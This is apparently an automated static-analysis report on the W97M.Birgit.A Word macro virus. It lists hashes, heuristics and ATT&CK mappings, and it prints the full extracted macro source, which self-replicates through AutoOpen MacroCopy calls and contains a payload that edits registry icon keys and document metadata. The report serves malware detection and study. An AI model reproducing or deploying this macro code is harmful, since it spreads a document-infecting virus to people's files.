W97M.Birgit.A — Office (OLE) malware analysis

Static analysis result for SHA-256 62475be683e0f2c6…

MALICIOUS

Office (OLE)

29.0 KB Created: 1998-07-20 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d93b2bcd5d0de7de53bc6fb252feece8 SHA-1: 75f6683d7379c62c3c09e4ee79e9845585a7f060 SHA-256: 62475be683e0f2c619857c942dea0c7a902407158cded43fb96845272792db3d
136 Risk Score

Malware Insights

W97M.Birgit.A · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of macro-based malware. The script attempts to copy itself to other documents and modifies registry keys related to Word icons, likely to establish persistence or spread. The ClamAV detection name 'Doc.Trojan.Brigit-1' further supports the classification as malware.

Heuristics 5

  • ClamAV: Doc.Trojan.Brigit-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Brigit-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    uCkAc$ = "AutoClose"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1930 bytes
SHA-256: 0835341f5f1ef57872165f56a38da4b07615c7ecd11112532f1fee0402f9a618
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
'****************************************
'* ULTRAS CONSTRUCTION KIT FOR WORD 7.0 *
'*            Version 1.0               *
'****************************************
'Name Macro Virus: "W97M.Birgit.A"
'************************************************************
'* AutoOpen macro                                           *
'************************************************************
Sub AutoOpen()
On Error Resume Next
uCkAo$ = filename$() + ":AutoOpen"
uCkAc$ = "AutoClose"
uCkAx$ = "AutoExec"
uCkAn$ = "AutoNew"
uCkAe$ = "AutoExit"
uCkTm$ = "ToolsMacro"
uCkFt$ = "FileTemplates"
uCkTc$ = "ToolsCustomize"
MacroCopy uCkAc$, uCkAo$
MacroCopy uCkAx$, uCkAo$
MacroCopy uCkAn$, uCkAo$
MacroCopy uCkAe$, uCkAo$
MacroCopy uCkTm$, uCkAo$
MacroCopy uCkFt$, uCkAo$
MacroCopy uCkTc$, uCkAo$
FileSaveAs .Format = 1
MacroCopy uCkAc$, uCkAo$
MacroCopy uCkAx$, uCkAo$
MacroCopy uCkAn$, uCkAo$
MacroCopy uCkAe$, uCkAo$
MacroCopy uCkTm$, uCkAo$
MacroCopy uCkFt$, uCkAo$
MacroCopy uCkTc$, uCkAo$
FileSave
Payload
End Sub
Sub Payload()
U = Int(Rnd() * 30) + 1
If Day(Now()) = U Then
    SetPrivateProfileString "HKEY_CLASSES_ROOT\WORD.DOCUMENT.6\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,31", ""
    SetPrivateProfileString "HKEY_CLASSES_ROOT\Word.Template\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,32", ""
AppHide ("Program Manager")
FileSummaryInfo Author:= = "Doctor Rave"
FileSummaryInfo Subject:="Virus"
FileSummaryInfo Title:="W97M.Birgit.A"
FileSummaryInfo Keywords:=""
FileSummaryInfo Comments:="Infected"
MsgBox ("This Virus is dedicated to Birgit R*B*T*C*E*"), ("W97M.Birgit.A")
End Sub